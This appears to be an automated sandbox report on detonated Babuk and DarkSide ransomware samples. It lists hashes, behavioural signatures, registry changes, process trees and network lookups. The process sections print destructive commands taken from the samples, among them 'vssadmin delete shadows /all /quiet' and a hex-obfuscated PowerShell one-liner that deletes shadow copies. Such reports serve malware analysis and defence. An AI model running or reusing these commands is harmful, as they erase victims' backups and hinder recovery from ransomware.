MD5 6c03245d5980669fa8dcb0bb5136d217
SHA1 c675715811352edf59bcb7c9204f0640d8330e81
SHA256 d9dbb21c063fc20d970eee5ede2df22b3544ab8e1fb49946639d0db814016feb
SHA512 964fe4f7d273d549d51279024839b0e617211c9db0049231bb92119357d0bee83b50a8b09424b886fe515e7b53f08cddb57672261d2aa9649d36f6a388a0e23b

memory/2380-280-0x0000000001350000-0x0000000001367000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240508-en

Max time kernel

1561s

Max time network

1563s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (227) files with added filename extension

ransomware

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 1048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2372 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2372 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2372 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

C:\PerfLogs\Admin\How To Restore Your Files.txt

MD5 81fc4c91a0938482f65a72216cda1e39
SHA1 3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512 ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral18

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1714s

Max time network

1156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (162) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\bf9fb421.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\bf9fb421.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies Control Panel

evasion

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421\ = "bf9fb421" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\bf9fb421.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 catsdegree.com udp
US 13.248.169.48:443 catsdegree.com tcp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 temisleyes.com udp
HK 154.219.131.251:443 temisleyes.com tcp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
